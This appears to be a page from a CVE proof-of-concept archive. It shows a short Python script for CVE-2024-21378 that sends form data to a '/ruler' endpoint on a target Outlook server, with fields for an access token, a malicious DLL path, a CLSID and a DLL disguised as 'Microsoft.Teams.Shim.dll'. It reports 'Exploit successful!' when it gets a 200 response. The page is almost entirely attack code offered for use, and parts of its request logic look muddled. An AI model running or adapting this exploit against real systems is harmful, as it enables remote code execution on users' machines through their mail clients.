4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2024-21378.py PY
import requests

# Change these values to match your target environment
target_url = 'https://outlook-target.com'
access_token = 'YOUR_ACCESS_TOKEN_HERE'
recipient_email = '[email protected]'
dll_path = 'path/to/malicious.dll'
clsid = '{00000000-0000-0000-0000-000000000001}'  # Replace with a valid CLSID

# Craft the form data for the request
form_data = {
    'token': access_token,
    'email': recipient_email,
    'o365': True,
    'debug': True,
    'form': 'add-com',
    'dll': dll_path,
    'suffix': 'Evil',
    'clsid': clsid,
    'name': 'Microsoft.Teams.Shim.dll',
    'send': True
}

# Send the request to the Ruler endpoint
response = requests.post(f'{target_url}/ruler', data=form_data)

# Check if the request was successful
if response.status_code == 200:
    print('Exploit successful! Malicious form sent to target.')
else:
    print('Exploit failed! Check your parameters and try again.')